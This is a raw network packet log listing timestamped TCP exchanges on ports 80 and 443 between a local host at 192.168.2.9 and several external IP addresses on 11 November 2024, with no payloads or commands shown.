                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115354061 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115355015 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115360975 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115366936 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115372896 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115417004 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.120240927 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.120286942 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.120302916 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.120345116 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.203627110 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.203643084 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.203649998 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.203665972 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.203677893 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.203701019 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.203748941 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.203982115 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.203999043 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.204010010 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.204037905 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.204067945 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.204160929 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.204174042 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.204220057 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.204235077 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.204792976 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.204838037 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.769994020 CET4926980192.168.2.964.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.774975061 CET804926964.225.91.73192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.775046110 CET4926980192.168.2.964.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.775305986 CET4926980192.168.2.964.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.780050993 CET804926964.225.91.73192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.102668047 CET4927680192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.107783079 CET804927672.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.108158112 CET4927680192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.127825975 CET4927680192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.132657051 CET804927672.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.324832916 CET804926964.225.91.73192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.325140953 CET4926980192.168.2.964.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.611483097 CET804927672.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.613162994 CET4927680192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.689541101 CET4927680192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.694693089 CET804927672.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.861460924 CET4927780192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.866358995 CET804927772.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.869091988 CET4927780192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.094928980 CET4927780192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.099808931 CET804927772.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.362453938 CET804927772.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.362515926 CET4927780192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.362600088 CET4927780192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.367428064 CET804927772.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.224805117 CET5597380192.168.2.952.34.198.229
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.230580091 CET805597352.34.198.229192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.230674028 CET5597380192.168.2.952.34.198.229
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.230922937 CET5597380192.168.2.952.34.198.229
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.236394882 CET805597352.34.198.229192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.944458961 CET805597352.34.198.229192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.944524050 CET5597380192.168.2.952.34.198.229
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.969794035 CET5597380192.168.2.952.34.198.229
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.975218058 CET805597352.34.198.229192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.975263119 CET5597380192.168.2.952.34.198.229
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.205013037 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.205075979 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:57.850642920 CET5429280192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:57.855832100 CET805429244.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:57.855969906 CET5429280192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:57.856105089 CET5429280192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:57.860960007 CET805429244.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.285528898 CET805429244.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.285586119 CET5429280192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.292747974 CET5429280192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.293581009 CET805429244.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.293632984 CET5429280192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.298185110 CET805429244.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.724643946 CET5495380192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.729536057 CET805495385.17.31.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.729619026 CET5495380192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.729769945 CET5495380192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.734924078 CET805495385.17.31.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.751533985 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.756355047 CET8056865188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.837270021 CET5687280192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.842099905 CET8056872208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.847852945 CET5495480192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.852997065 CET805495423.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.853100061 CET5495480192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.853358030 CET5495480192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.858196020 CET805495423.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.890543938 CET5687480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.890806913 CET5495580192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.895623922 CET8056874199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.895981073 CET8054955199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.896487951 CET5495580192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.896739960 CET5495580192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.901669025 CET8054955199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.902301073 CET8056977199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.902355909 CET5697780192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.929972887 CET5495680192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.932549000 CET5688480192.168.2.9154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.935544014 CET805495699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.935647964 CET5495680192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.936703920 CET5495680192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.939870119 CET8056884154.212.231.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.940177917 CET8056872208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.940429926 CET5687280192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.941514969 CET805495699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.994874954 CET5687280192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.000802040 CET8056872208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.098310947 CET8056872208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.099844933 CET5687280192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.144845009 CET805495385.17.31.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.144994974 CET5495380192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.152508974 CET8056865188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.153686047 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.158636093 CET8056865188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.159166098 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.167480946 CET5495380192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.172377110 CET805495385.17.31.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.292812109 CET8056884154.212.231.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.293301105 CET5688480192.168.2.9154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.308461905 CET805495423.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.308474064 CET805495423.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.308533907 CET5495480192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.322632074 CET8054955199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.322647095 CET8054955199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.322695971 CET5495580192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.322727919 CET5495580192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.365859032 CET805495699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.369223118 CET5495680192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.371556997 CET805495699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.373308897 CET5495680192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.382428885 CET5495680192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.388171911 CET805495699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.476962090 CET5495480192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.477083921 CET5495480192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.502931118 CET5496280192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.503679037 CET5496380192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.504043102 CET5688480192.168.2.9154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.507949114 CET805496285.17.31.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.508606911 CET5496280192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.508896112 CET805496323.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.508939028 CET5496380192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.509448051 CET5496280192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.510210037 CET8056884154.212.231.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.512057066 CET5496380192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.514434099 CET805496285.17.31.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.517375946 CET805496323.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.664150953 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.664210081 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.664278030 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.664520025 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.664532900 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.729150057 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.729181051 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.729252100 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.731018066 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.731029034 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.874531984 CET8056884154.212.231.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.875449896 CET5688480192.168.2.9154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.920219898 CET805496285.17.31.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.920284986 CET5496280192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.920367002 CET5496280192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.925220013 CET805496285.17.31.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.962601900 CET805496323.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.962845087 CET5496380192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.963061094 CET5496380192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.963077068 CET5496380192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.963182926 CET805496323.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.963246107 CET5496380192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.968821049 CET805496323.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.968866110 CET5496380192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.098864079 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.099006891 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.099541903 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.099553108 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.099724054 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.099729061 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.161324024 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.161401987 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.163086891 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.163095951 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.163372040 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.163433075 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.163749933 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.211349964 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.345737934 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.345803976 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.345829964 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.345865011 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.345877886 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.345885992 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.345916033 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.345944881 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.346772909 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.346848011 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.427112103 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.427246094 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.427988052 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.428050995 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429256916 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429266930 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429311037 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429312944 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429338932 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429352045 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429363012 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429398060 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429403067 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429441929 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.430057049 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.430116892 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.522537947 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.522583008 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.522608042 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.522627115 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.522646904 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.522665977 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523288012 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523329020 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523350954 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523358107 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523387909 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523407936 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523411989 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523456097 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523500919 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523509979 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523653030 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523669958 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969259024 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969307899 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969316959 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969341040 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969353914 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969382048 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969387054 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969392061 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969412088 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969434023 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969439030 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969470024 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969480038 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969485044 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969501972 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969523907 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969527960 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969557047 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969856977 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969903946 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969917059 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.970005035 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.970019102 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.970035076 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.970056057 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.970071077 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.995275021 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.000319958 CET8056865188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.366235018 CET8056865188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.366358042 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.373406887 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.373437881 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.373574018 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.373804092 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.373812914 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.816106081 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.816232920 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.818154097 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.818161964 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.818418980 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.818479061 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.818918943 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.863334894 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669182062 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669249058 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669258118 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669267893 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669287920 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669325113 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669342995 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669347048 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669375896 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669404984 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669408083 CET44354978188.114.96.3192.168.2.9
